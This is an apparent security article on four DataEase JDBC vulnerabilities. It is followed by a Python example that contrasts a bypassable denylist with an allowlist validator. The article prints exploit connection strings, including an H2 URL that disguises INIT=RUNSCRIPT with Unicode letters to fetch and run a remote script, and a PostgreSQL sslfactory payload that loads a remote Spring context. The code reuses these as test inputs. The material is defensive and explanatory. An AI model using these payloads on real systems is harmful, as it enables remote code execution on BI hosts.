
DataEase, an open-source business intelligence (BI) platform known for its ease of use and data visualization capabilities, has been found to contain several critical vulnerabilities in its database connection handling mechanisms. These flaws, if exploited, can allow remote attackers to gain unauthorized access, bypass JDBC parameter filtering, and in some cases execute arbitrary code on the host system. The vulnerabilities affect all versions up to and including v2.10.10 and have been patched in v2.10.11.
CVE-2025-49003: H2 JDBC Unicode-based Remote Code Execution
CVE-2025-49003 affects the H2 database integration and leverages Java’s Unicode case-conversion behavior. In Java, the lowercase dotless letter “ı” becomes “I”, and the long s “ſ” becomes “S” when converted to uppercase. Attackers can use these characters to disguise INIT commands in the connection string, bypassing traditional pattern detection that relies on exact casing. A sample payload uses:
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;ıNIT=RUNſCRIPT FROM 'http://127.0.0.1:50025/poc.sql'
Because most filters look for uppercase INIT, this trick lets malicious commands slip through undetected. Once executed, the payload fetches and runs a remote script file, achieving full remote code execution on the host system.
CVE-2025-53004: Redshift JDBC Connection Parameter Bypass
One of the most severe vulnerabilities identified is CVE-2025-53004, which affects Redshift data source connections in DataEase. While the software had implemented filters to detect and block risky JDBC parameters like socketFactory and socketFactoryArg, it failed to consider alternatives such as sslfactory and sslfactoryarg. By abusing these overlooked parameters, an attacker can craft a malicious connection string that references an external XML payload, effectively injecting untrusted configurations. As stated in the advisory, “although the socketFactory and socketFactoryArg parameters in the JDBC string can now be detected, the sslfactory and sslfactoryarg parameters can also trigger this bypass vulnerability.” Once triggered, this vulnerability allows the execution of external logic loaded from attacker-controlled infrastructure.
CVE-2025-53005: PostgreSQL JDBC Parameter Injection
Targeting PostgreSQL integrations specifically, CVE-2025-53005 exposes another method to execute remote content by injecting malicious parameters into the JDBC connection string. A specially crafted connection string using sslfactory and sslfactoryarg can instruct the application to load Spring Framework objects from a remote server. An example provided in the advisory uses the payload:
jdbc:postgresql://vps:5433/testdb?sslfactory=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext&sslfactoryarg=http://malicious-domain.
This bypass works by exploiting the application’s trust in the JDBC configuration without properly validating the origin of the content. As a result, attackers may remotely execute arbitrary Java logic under the guise of a valid database connection.
CVE-2025-53006: PostgreSQL and Redshift JDBC Extended Parameter Bypass
CVE-2025-53006 expands on the previous vulnerability by targeting a broader range of JDBC parameters. It affects both PostgreSQL and Redshift connectors and leverages fields such as sslhostnameverifier, sslpasswordcallback, and authenticationPluginClassName. These parameters are not filtered effectively, especially when they are evaluated after the connection has been established. Attackers can use these fields to manipulate the JDBC environment post-authentication, allowing stealthy loading of Java classes such as FileSystemXmlApplicationContext from remote sources. The advisory explains that “this can only be triggered after establishing a connection,” making detection difficult. This creates a significant risk of persistent backdoor execution, especially in automated BI workflows.
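The four advisories above share one root cause: a denylist applied to the raw connection string, while the driver interprets the string differently (H2 upper-cases setting names with the full Unicode mapping, so “ıNIT” becomes INIT; pgjdbc and the Redshift driver accept several class-loading properties besides socketFactory). The following Python example is added here and is not DataEase’s code: it models the weak filter described in the article, shows how the H2 Unicode trick and the sslfactory/sslhostnameverifier/authenticationPluginClassName parameters slip past it, and contrasts it with an allowlist validator that rejects non-ASCII keys outright and only forwards known-safe parameters. Python’s str.upper() applies the same Unicode mapping as Java’s String.toUpperCase() for the two characters in question. The URLs and the allowlist contents are constructed for illustration; the allowed key sets are an assumption, not DataEase’s configuration.

```python
# Added example (not DataEase's code). It models the two filter weaknesses the
# article describes: an ASCII-only, exact-token denylist that (a) does not see
# "ıNIT" as INIT although the H2 driver does, and (b) knows socketFactory but
# not sslfactory or the other class-loading properties. The allowlist
# validator below is the replacement. All URLs and allowlist contents are
# constructed for illustration.

DENYLIST = ("INIT=", "SOCKETFACTORY=", "SOCKETFACTORYARG=")


def ascii_upper(text: str) -> str:
    """Upper-case only ASCII letters, the way a hand-rolled filter or a
    case-insensitive regex without a Unicode flag behaves."""
    return "".join(ch.upper() if ch.isascii() else ch for ch in text)


def naive_is_blocked(url: str) -> bool:
    """Denylist match on an ASCII-folded copy of the raw URL (the weak pattern)."""
    folded = ascii_upper(url)
    return any(token in folded for token in DENYLIST)


def driver_view(key: str) -> str:
    """How a driver that upper-cases setting names (H2 does) sees a key.
    Python's str.upper() applies the same Unicode mapping as Java's
    String.toUpperCase(): U+0131 'ı' -> 'I' and U+017F 'ſ' -> 'S'."""
    return key.upper()


def split_params(url: str) -> dict:
    """Split a JDBC URL into its settings. H2 separates settings with ';'
    after the database path; PostgreSQL and Redshift use '?key=v&key=v'."""
    if url.startswith("jdbc:h2:"):
        parts = url.split(";")[1:]
    else:
        query = url.partition("?")[2]
        parts = query.split("&") if query else []
    params = {}
    for part in parts:
        key, sep, value = part.partition("=")
        if sep:
            params[key.strip()] = value
    return params


# Keys a BI front end may legitimately forward. Constructed for the example
# (an assumption); a real deployment derives it from the features it supports.
ALLOWED_KEYS = {
    "h2": {"MODE", "DB_CLOSE_DELAY", "TRACE_LEVEL_SYSTEM_OUT"},
    "pg": {"SSL", "SSLMODE", "CURRENTSCHEMA", "APPLICATIONNAME", "CONNECTTIMEOUT"},
}


def validate_jdbc_url(url: str) -> list:
    """Return the keys that must be rejected; an empty list means accept.

    Two rules replace the denylist: a key containing any non-ASCII character
    is rejected before any case handling, and every remaining key must appear
    on the allowlist after full-Unicode upper-casing (matching case-
    insensitively is the conservative choice, since drivers differ in how
    they match property names). socketFactory, sslfactory, sslhostnameverifier,
    sslpasswordcallback and authenticationPluginClassName are simply absent
    from the list, so there is no alternative spelling left to forget.
    """
    family = "h2" if url.startswith("jdbc:h2:") else "pg"
    rejected = []
    for key in split_params(url):
        if not key.isascii() or key.upper() not in ALLOWED_KEYS[family]:
            rejected.append(key)
    return rejected


# Constructed inputs mirroring the shapes shown in the advisory excerpts.
H2_UNICODE_URL = ("jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;"
                  "ıNIT=RUNſCRIPT FROM 'http://127.0.0.1:50025/poc.sql'")
PG_KNOWN_URL = ("jdbc:postgresql://db.example:5432/testdb"
                "?socketFactory=some.Class&socketFactoryArg=x")
PG_ALT_URL = ("jdbc:postgresql://db.example:5432/testdb"
              "?sslfactory=some.Class&sslfactoryarg=http://untrusted.example/ctx.xml")
PG_EXTENDED_URL = ("jdbc:postgresql://db.example:5432/testdb"
                   "?sslhostnameverifier=some.Class&authenticationPluginClassName=other.Class")
PG_BENIGN_URL = "jdbc:postgresql://db.example:5432/testdb?sslmode=require&ApplicationName=bi"

if __name__ == "__main__":
    cases = [("h2 unicode", H2_UNICODE_URL), ("pg socketFactory", PG_KNOWN_URL),
             ("pg sslfactory", PG_ALT_URL), ("pg extended", PG_EXTENDED_URL),
             ("pg benign", PG_BENIGN_URL)]
    for name, url in cases:
        print(f"{name:18} denylist blocks={naive_is_blocked(url)!s:5} "
              f"allowlist rejects={validate_jdbc_url(url)}")
```

Running the block prints one line per constructed URL: the denylist blocks only the socketFactory form, while the allowlist validator rejects the Unicode H2 key and every class-loading property and accepts the benign PostgreSQL URL. The design point is that the validator never tries to recognise a bad key; it only recognises good ones, and it refuses any key that could be reinterpreted by the driver’s own case handling.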